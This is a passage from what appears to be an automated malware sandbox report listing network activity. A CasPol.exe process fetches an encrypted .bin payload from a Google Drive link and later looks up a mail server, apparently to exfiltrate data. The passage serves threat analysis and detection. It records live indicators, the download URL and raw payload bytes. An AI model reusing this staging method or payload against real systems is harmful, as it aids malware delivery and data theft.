Dec 14, 2021 12:52:59.844049931 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.844361067 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.844569921 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.844595909 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.844841957 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.845101118 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.845340967 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.845361948 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.845612049 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.845766068 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.845964909 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.845983982 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.846190929 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.846422911 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.846674919 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.846697092 CET	443	49815	142.250.185.161	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2021 12:52:58.742276907 CET	60827	53	192.168.11.20	1.1.1.1
Dec 14, 2021 12:52:58.751523018 CET	53	60827	1.1.1.1	192.168.11.20
Dec 14, 2021 12:52:59.479439974 CET	59356	53	192.168.11.20	1.1.1.1
Dec 14, 2021 12:52:59.537261009 CET	53	59356	1.1.1.1	192.168.11.20
Dec 14, 2021 12:54:35.615478992 CET	64697	53	192.168.11.20	1.1.1.1
Dec 14, 2021 12:54:35.671631098 CET	53	64697	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 14, 2021 12:52:58.742276907 CET	192.168.11.20	1.1.1.1	0xd480	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 14, 2021 12:52:59.479439974 CET	192.168.11.20	1.1.1.1	0xc3a3	Standard query (0)	doc-14-38-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 14, 2021 12:54:35.615478992 CET	192.168.11.20	1.1.1.1	0x33e3	Standard query (0)	mail.fortunametals.es	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 14, 2021 12:52:58.751523018 CET	1.1.1.1	192.168.11.20	0xd480	No error (0)	drive.google.com		142.250.185.238	A (IP address)	IN (0x0001)
Dec 14, 2021 12:52:59.537261009 CET	1.1.1.1	192.168.11.20	0xc3a3	No error (0)	doc-14-38-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 14, 2021 12:52:59.537261009 CET	1.1.1.1	192.168.11.20	0xc3a3	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)
Dec 14, 2021 12:54:35.671631098 CET	1.1.1.1	192.168.11.20	0x33e3	No error (0)	mail.fortunametals.es	fortunametals.es		CNAME (Canonical name)	IN (0x0001)
Dec 14, 2021 12:54:35.671631098 CET	1.1.1.1	192.168.11.20	0x33e3	No error (0)	fortunametals.es		94.23.221.28	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-14-38-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49814	142.250.185.238	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-14 11:52:58 UTC	0	OUT	GET /uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-14 11:52:59 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 14 Dec 2021 11:52:59 GMT Location: https://doc-14-38-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6et0sg0enesn34rrf8kvhhdrn/1639482750000/03916840094075221792/*/1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-ioMbSSVL3MqwuGoCltF/zg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=IV_78Mg3VJCdvyvWfTM0Dp-Iyti-5dIYsCs2j2lWE38OmjgzXWOlnziQHVOXZdzeD_hI-JKpZMytV3hUaOf_zJAOcVZItfcKSQDVcGfqYH-dX5GeEMrPbxCMdkQZmHCth1sPa07cEPQSmAa-AUlCb-xC9OnXfSyUqDyy4Y2FyYA; expires=Wed, 15-Jun-2022 11:52:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-14 11:52:59 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 33 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 62 37 71 66 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-38-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qf
2021-12-14 11:52:59 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49815	142.250.185.161	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-14 11:52:59 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6et0sg0enesn34rrf8kvhhdrn/1639482750000/03916840094075221792/*/1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-38-docs.googleusercontent.com Connection: Keep-Alive
2021-12-14 11:52:59 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvft_lo4dTDNPnzPwbgDnQJHbYAr5t1CW-IrmR4qVCAzv29_zzKWWrvyYiFE7buQxaGaNAPY4W7PnPGvuTzpQa6HykQOA Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="KINGPENT DEC1_ZyiegzcO217.bin";filename*=UTF-8''KINGPENT%20DEC1_ZyiegzcO217.bin Content-Length: 221760 Date: Tue, 14 Dec 2021 11:52:59 GMT Expires: Tue, 14 Dec 2021 11:52:59 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=jSbm2Q== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-14 11:52:59 UTC	6	IN	Data Raw: bd 43 5b 17 12 5b 1f 35 81 1c 0e ee 76 c1 31 49 a2 1a 40 3c b9 97 a7 0b 26 76 70 ed 14 99 c3 70 65 79 35 2d 43 15 c0 b2 40 0c 70 5c ab 94 68 19 14 4d 00 96 04 e7 84 11 3c c5 16 38 0b 3e d8 6a 53 b8 ca 4d 95 1e d1 d4 c7 d3 31 88 1c d2 5d 92 9e 98 35 5f e7 b6 7c 52 5d e8 1f 69 5b 16 0b 29 1e cf 00 ca 67 ca cf 02 5f 01 95 2e aa 6c 02 e2 e1 1a 8c 23 1f 52 a1 dd c4 56 fa 9b e6 40 c8 ec 72 3d 6e 69 5b eb 1b 62 96 2a 4d 17 1c b4 4b d5 73 bf dc 1e 32 66 3f 8d ca a4 3c 8f 6f 22 a6 83 d1 54 14 ad 69 cf b2 31 3b b3 37 0b 1c 28 57 be 54 40 35 df cf f3 f6 b3 ea bf 7d 2f 21 05 9d cd 97 39 2e ef 71 e8 01 f1 98 62 3e 11 9c cc 10 34 c0 56 5a f7 0e af 71 6c af b5 40 86 f1 be e2 36 03 04 5d d8 e7 3d ce 80 61 9e 7b a3 e7 85 c6 1d c6 b7 db 3e 63 32 70 12 7a e8 6b 73 80 05 0f Data Ascii: C[[5v1I@<&vppey5-C@p\hM<8>jSM1]5_\|R]i[)g_.l#RV@r=ni[b*MKs2f?<o"Ti1;7(WT@5}/!9.qb>4VZql@6]=a{>c2pzks
2021-12-14 11:52:59 UTC	10	IN	Data Raw: a3 27 e8 86 d7 08 fa be 17 5b ae a2 0f 40 e7 87 9e 1a 71 21 48 cc 92 c8 31 96 9a 65 5d 69 e8 a8 8a c1 c8 11 8f 10 4f f4 b3 71 2b 7a bd aa ef 16 91 ff af aa 03 29 49 5d 13 f1 b5 93 6c c9 51 7a 18 49 d2 c7 83 c1 d3 3a 01 1c 17 37 20 fd 7e 1b da 23 15 86 55 8f ad e2 d9 f9 3b ef 0f 5b 4b eb 78 06 ac 87 3b 4f cf 6f 47 5f 33 0f 0c df d0 a5 9c 8e 13 cd 25 26 33 05 dd 7b 63 1e f6 19 7a 24 ab 42 cf a0 cd 0c b2 40 64 d8 54 77 74 db 56 85 9c 10 6c 9f 82 66 6a 9a 91 56 4e 62 3d 1b 2e 8e 2c 69 f9 e0 af 00 e3 4a 9a f2 53 53 ef 4d 49 2c a6 1d 9f b2 d5 29 88 4a fb 32 74 82 72 ce 8d 64 9b f3 aa c7 37 eb 63 85 fb e6 1e 24 19 1d 7f 5c 7d 29 9b a5 d8 1d ed ef 17 66 49 e6 f4 90 02 06 de 09 9d 00 87 ed de 5f 0b b6 ed 6d ae b7 23 f9 54 df 84 5a b7 e8 28 dd 49 20 83 2b 9f 28 28 Data Ascii: '[@q!H1e]iOq+z)I]lQzI:7 ~#U;[Kx;OoG_3%&3{cz$B@dTwtVlfjVNb=.,iJSSMI,)J2trd7c$\})fI_m#TZ(I +((
2021-12-14 11:52:59 UTC	13	IN	Data Raw: 59 dd ae 76 b3 3d fd 91 79 95 2b 43 59 25 5e 6c 95 c8 41 60 96 bb d9 a6 0c d7 50 37 1e 11 4c d0 c7 d4 b6 46 59 1d 5d 87 15 e1 26 e4 93 52 cf c8 9f 62 f1 01 44 10 32 9c 3a ad 48 9d 4e 71 fe 13 71 9d 1b 1a 0d 7b da 7f eb 23 f0 42 aa d5 29 30 ac 4d 3b b0 52 66 09 a9 74 e5 1c 0e e1 f3 51 42 b9 de 95 72 7c e5 59 71 80 27 af 14 3a 4d 37 9c 53 46 d8 75 85 4c 95 07 4e 82 a6 6a 9c 8e 56 87 14 13 c7 d7 1f bf 2b 12 f0 e2 f1 03 4f 84 f6 4b 11 a2 1f 8c 19 68 d7 53 f6 e6 9d b5 cd 3b 05 02 2d c7 29 1c 85 1c d6 30 83 2c d9 c8 4a bc 8a 1a bb 69 e6 22 db 48 3c 5c 22 5e 9c 99 d5 bc 41 80 4b 68 d6 19 80 2c a4 c4 95 87 9e a6 0a b3 e8 4e 53 bf 96 72 12 61 09 c0 a0 68 b3 cf 17 21 ac 83 6e b2 73 30 49 fb db ab 24 88 96 73 76 cb 13 0b b2 99 25 b4 b8 2b 48 6d ff 14 42 d2 cd 35 2c Data Ascii: Yv=y+CY%^lA`P7LFY]&RbD2:HNqq{#B)0M;RftQBr\|Yq':M7SFuLNjV+OKhS;-)0,Ji"H<\"^AKh,NSrah!ns0I$sv%+HmB5,
2021-12-14 11:52:59 UTC	17	IN	Data Raw: f3 d6 ee 09 4d 1a 06 16 79 26 cc 72 60 cd e8 06 29 ad 6a 35 50 f8 63 d4 db 76 4d 3d c7 48 94 54 97 8a 40 25 2d 1d a8 41 63 5b 9a 86 27 84 99 cd 15 e2 3d 47 6f 6d fc 85 4f 97 17 71 b8 85 47 6f 8a 9e e3 35 b8 52 1e 69 5d 1a f4 c2 20 7c a8 73 35 76 a8 b3 0b 89 c5 ed 2b da fd 0b f9 91 8d 32 94 e1 5c 53 38 1e a1 1d fd 37 c1 9e f3 9a 88 9c 45 63 0e 79 36 ec bd eb 1b 12 d9 f1 82 16 f2 be e7 82 04 db 3c c1 cf 50 3d d0 ac 7b 20 2c 25 29 c5 10 97 6c f1 e8 78 30 3f 02 e9 c5 eb 3a af 74 13 ad 8d 0a 66 0a b2 8b 88 46 86 bf 44 e0 b1 5b 56 97 cf b9 25 90 95 a6 d5 93 a7 c0 e2 4b 45 be d1 d1 d4 c5 bc f7 88 e3 27 83 9d 03 b0 02 5f e7 bc 6f 7c 35 d0 1f 69 51 c8 0b 38 16 e7 e2 ca 67 cc a0 c4 5f 01 9f f0 a5 49 2a d5 e1 1a 86 30 30 7a 99 dd c4 5c 24 9b 77 48 e0 eb 7d 22 d2 08 Data Ascii: My&r`)j5PcvM=HT@%-Ac['=GomOqGo5Ri] \|s5v+2\S87Ecy6<P={ ,%)lx0?:tfFD[V%KE'_o\|5iQ8g_I*00z\$wH}"
2021-12-14 11:52:59 UTC	18	IN	Data Raw: f8 60 68 26 54 35 01 f7 16 bf 4d d9 cf 72 5f f8 6d 24 cf cd 21 8e 4d da 87 be 0e 6e 72 c5 46 88 42 a4 be 9a ef 9e 1c ac 97 cf b9 10 ac ba e0 cc 93 ad 1a 8d 97 4d 96 14 f7 0a cc f6 19 bf e3 2d 57 81 1a b0 0d 5f e7 bc a2 52 0f a9 37 b8 5b 16 01 13 77 31 ff 35 b9 c4 dd 43 a1 17 9a 2e aa 77 6d b5 e1 1a 86 ff 0e 55 ce 0f c4 56 f0 f4 af 40 c8 e6 65 1c b9 66 5b 5f 6c a1 b7 92 48 4c e2 a8 37 7d 18 cc fa 46 6a 09 58 f9 83 e1 1c ec 08 5d cf 83 77 74 76 c2 61 99 c7 5f 11 ce 4f 03 6a 67 04 98 1f f2 6b bb e1 fe de 91 f9 bf 7d 25 32 38 89 de c0 54 16 ef 3d e3 df d4 00 6f 99 0e 92 cc 10 30 d8 16 c6 f7 ee af 68 e0 b1 b4 4b 87 e2 a6 f0 76 15 24 92 da e7 3b 6c 91 7f ff 06 b4 e7 a5 c2 35 83 b5 db 38 4b 65 32 12 7c a7 13 73 80 0d ad 74 f5 b0 c0 d4 d5 08 fc 1c 04 1b ee 8a 34 Data Ascii: `h&T5Mr_m$!MnrFBM-W_R7[w15C.wmUV@ef[_lHL7}FjX]wtva_Ojgk}%28T=o0hKv$;l58Ke2\|st4
2021-12-14 11:52:59 UTC	19	IN	Data Raw: 5e 39 c0 63 2c a6 1c 92 1a cb 31 fb 1d fb 32 7e 28 70 d9 9e 6e 8d e0 ad cb bb d4 62 85 fa f5 18 c7 23 15 76 43 79 01 c1 73 d0 17 ea 8f 4f 66 49 f6 e5 97 69 dc 69 66 c6 e5 8f e7 cd 54 1a b3 fc 99 70 a4 24 e7 50 d6 95 46 9f b2 29 dd 43 31 86 46 ca 28 28 32 41 23 af 4a b8 16 ff b5 9a bd 5e 5b 59 23 5d 44 0e c8 41 75 b7 cd db a8 0a ff cb 1a 17 1b 53 d6 4b 8b b6 5c 58 35 c7 87 15 eb 39 d7 16 0d cf c6 9e 4a 6a 46 4d 1a 1a e4 38 ad 4e af d5 71 ff 19 59 e5 19 4c 02 53 41 6c eb 29 d8 0e a3 d5 23 17 37 4d 3b a0 7a 23 0a a9 72 cd 87 76 e8 f9 79 6a b9 de 9f dc ee e5 59 74 9f 2d 23 51 3a 4d 37 b4 c8 46 d8 ea a4 35 97 09 48 aa 3d c9 95 84 7e f3 16 13 c1 e5 84 bf 2a 18 d8 e6 f1 ac 40 eb 6c 45 11 a8 70 50 10 68 dd 77 6d e6 9d a5 d2 31 88 5d 2d c7 28 fd 17 1c d6 34 ab 5e Data Ascii: ^9c,12~(pnb#vCysOfIiifTp$PF)C1F((2A#J^[Y#]DAuSK\X59JjFM8NqYLSAl)#7M;z#rvyjYt-#Q:M7F5H=~*@lEpPhwm1]-(4^
2021-12-14 11:52:59 UTC	21	IN	Data Raw: 5e 0a f2 ea 07 7c a8 79 0a eb a8 bf 1b af d4 eb 10 22 fc 0b 75 97 a5 00 9e e1 5a 6a 09 15 99 6b 92 fa c1 9e fe a0 67 9a 41 a7 0e 16 f9 fd bb c9 2a 20 d2 f5 80 2c f9 be ea f0 37 da 10 c0 eb 57 39 97 94 79 20 20 07 1f fc 12 90 73 27 ce 54 36 36 7b 0a cc f1 3b 89 62 0f 7b bf 24 6e 24 f3 44 88 40 a6 85 91 ef 93 69 9f 96 e3 b8 34 d2 74 9e d5 99 bb 2d 57 41 46 96 19 c9 2a c2 ff 37 8b f5 1f 7f 8b 2d 98 32 48 19 b7 50 50 05 e3 1f 6e 4d e8 0a 05 1c d8 0b ca 60 d4 31 03 73 03 be 2b 92 13 fd 1d 1e 1c a6 23 1f 41 91 df c4 ca fa 9b 66 67 c8 ec 6d 34 c7 63 63 df 12 af b7 92 5d 5f ca 6b 1e 91 1d c5 f4 f4 4b 15 4b fb ab d8 18 f5 f0 4d e4 e9 b3 78 6c db 4d bd d6 5b 0c 24 58 07 5b 7f 17 9a 39 3e 55 a0 1f ff d7 bc e5 e7 66 3c 25 05 8c c9 db 82 2f c3 2c ee 6d 9c 01 6f 93 72 Data Ascii: ^\|y"uZjkgA* ,7W9y s'T66{;b{$n$D@i4t-WAF*7-2HPPnM`1s+#Afgm4cc]_kKKMxlM[$X[9>Uf<%/,mor
2021-12-14 11:52:59 UTC	22	IN	Data Raw: 5a fd 13 cf d6 a3 bc da ef cc 0f 5a 64 2d 3e 73 65 77 8c fd 78 2e a6 2a c3 9a cd 06 b9 35 3b d8 5c 66 a2 94 78 96 9c 2e a3 b3 82 60 48 64 d3 dd 48 0d 45 1c 41 d0 26 75 ff ec a0 70 b6 b4 9b d4 ef 43 21 e8 88 2e a6 1a 30 ae c3 3d fb 1b e4 3e 80 90 5a d2 99 76 f3 f9 ad d1 bf 76 7c 88 f6 f5 10 10 35 eb 77 61 70 06 da db c1 17 ea 84 ed 79 58 e0 e5 9f 75 22 68 4a d2 06 af c9 cf 5a 1c a5 d4 44 78 a4 2e fe 6b a3 95 5c 9f ac 24 dd 4b 2b 78 45 ef 3b 2e 14 a4 21 af 5c 99 f0 fd ba 9c d2 26 41 59 29 56 5f 02 c8 49 72 40 cc f7 b4 22 fb cb 37 18 74 53 db 4b 81 d9 47 59 35 cc 8d 0c e7 39 e6 00 04 31 c9 b2 5d 14 09 44 1a 1e 95 20 ad 4e b1 fd 55 fe 19 53 65 11 1a 0b 57 5e 75 e7 29 d0 70 54 d4 0f 1a 2f 41 3b b2 6c dd 0a 85 70 da 8b 0e e9 e6 6b 9a b8 f2 9d 71 e2 dd 2a 85 60 Data Ascii: ZZd->sewx.5;\fx.`HdHEA&upC!.0=>Zvv\|5wapyXu"hJZDx.k\$K+xE;.!\&AY)V_Ir@"7tSKGY591]D NUSeW^u)pT/A;lpkq`
2021-12-14 11:52:59 UTC	23	IN	Data Raw: 39 c4 49 51 78 0f 0b c4 39 38 98 fc 3c 47 06 1c f6 d9 6e 44 51 e6 95 68 55 bd ac 9c 5b 08 17 56 44 93 e2 8d 5c 2f e3 a8 06 17 eb 22 91 a4 41 f8 a4 ab 8c 7a 5d de 82 be 46 61 9e f4 3e a9 52 2a a5 5e 36 f0 c1 05 57 3f 7e 4d 6d a3 b4 09 9e 75 fc 29 12 ff 18 cf 94 a5 af 96 e1 5a 55 1f 1e b0 01 81 fe f9 0b f9 bc 99 9b 7c ae 17 87 31 d1 a5 c5 46 1a d8 f7 a0 4f d7 be ed e9 c1 41 2a e3 c7 41 3a f2 70 87 21 13 5a 01 f7 12 8b 79 dd cf 69 34 2f 93 25 e9 e3 08 e2 65 14 85 a5 1b 62 0c cc 42 91 b8 8d b5 95 f9 ea 56 61 97 cb 3d 81 aa 67 93 d9 89 be 1a e2 4b 49 81 e0 d0 f8 c0 cb 22 8c e3 3c 59 8e d8 99 19 5a f0 9c 61 41 19 e8 0e 6d 43 e8 0a 05 0d b1 22 ca 67 ce e7 00 5e 01 9f 41 c7 6c 02 e8 eb 03 9f 27 1f 43 a5 cb 3a 57 d6 98 71 53 cc ec 6d 26 c9 99 5a 73 10 84 b2 aa 2a Data Ascii: 9IQx98<GnDQhU[VD\/"Az]Fa>R^6W?~Mmu)ZU\|1FOAA:p!Zyi4/%ebBVa=gKI"<YZaAmC"g^Al'C:WqSm&Zs*
2021-12-14 11:52:59 UTC	24	IN	Data Raw: ac aa 68 bf 82 a4 09 e2 c6 c2 e7 0b 29 48 53 3d de fc 93 6a eb 1a 31 18 43 58 c9 94 ae 9b e7 62 15 11 17 02 ac 0a 28 ac 10 1d 86 5f 8d 92 85 94 f9 3d cd 2d 44 79 8e b7 0e ac 8d 39 ba c6 6e 47 59 5e 40 79 ec c3 dd bc c3 11 c9 0b 40 61 05 db 59 41 71 a4 13 fa 26 a0 45 bf 47 ea 0f b3 2f 35 c7 22 4e 45 eb 5c 85 9a 02 6c bb 81 66 66 a4 f5 dd 4e 68 bd 14 41 da 28 b4 fa ef a8 6f b9 55 ed cb fd 3a 31 c0 62 28 8e 17 91 b1 cb 19 df 13 fb 38 fe 99 76 d9 9a bc 66 e2 ad d1 b9 cb 1b b6 e3 8b 10 0f 25 11 5e 41 78 01 c7 8d fc 17 ea 8a cf 6e 49 ec e1 4a a5 de 69 66 c4 1f fe d4 d4 24 12 b3 fc 6e 50 a9 27 e8 56 fe b1 5c 9f b8 a8 d5 43 31 82 99 6c 2a 28 3c 43 3c d5 69 a8 68 f7 ba 9a b9 76 4f 5a 23 5a 6c 2a c8 41 60 3e c5 db a6 0e 22 5a 35 1e 1b 51 c5 30 b8 af 38 50 35 c6 83 Data Ascii: h)HS=j1CXb(_=-Dy9nGY^@y@aYAq&EG/5"NE\lffNhA(oU:1b(8vf%^AxnIJif$nP'V\C1l(<C<ihvOZ#ZlA`>"Z5Q08P5
2021-12-14 11:52:59 UTC	26	IN	Data Raw: b5 df 80 9a 13 a5 26 b2 d1 cc 58 a0 aa 79 21 41 18 db b9 51 d6 ce 3b 21 a2 82 f8 3b 60 3b 57 c1 53 b0 24 93 a5 f0 7b 35 18 0d af ab 36 bf c2 3d 49 6d fd 07 48 dc d5 2d 1c ee e2 c7 dd 9b 4e 36 0d 3c 4f 2d e4 6e 0e 01 e2 15 2b 89 ef 2e 50 e9 06 c5 c5 88 48 7d e1 8f 87 5f b9 b5 8b 25 27 04 58 5f 02 46 81 86 32 f3 ae 35 e9 e3 17 63 a6 3d fa e0 a9 97 77 57 c8 ab 53 5c 4d 8d f8 2c b3 a5 37 77 51 18 e3 e1 2f 6b a9 79 50 a8 b8 ac 1a bc cf ea 12 09 e5 f5 fe bb ac 11 9d fb 8c 68 14 05 b2 0c 92 eb da 80 07 bd b5 91 7c a1 16 af 23 f6 a4 ca 3a 0b d9 e6 b1 2e fd 40 ec c1 c3 ca 37 d5 3f 52 31 e7 76 6a 3b 2a 3c 1a ef ec 96 46 df d9 6b 3b 2c 7e 3f c5 fa 2b 96 47 ea 84 92 06 64 1d d6 6e 9f 47 8c 93 89 eb 8b 50 72 8c cf a2 2d a2 af 60 d4 bf a3 1c f3 51 65 80 1f d1 de d0 df Data Ascii: &Xy!AQ;!;`;WS${56=ImH-N6<O-n+.PH}_%'X_F25c=wWS\M,7wQ/kyPh\|#:.@7?R1vj;*<Fk;,~?+GdnGPr-`Qe
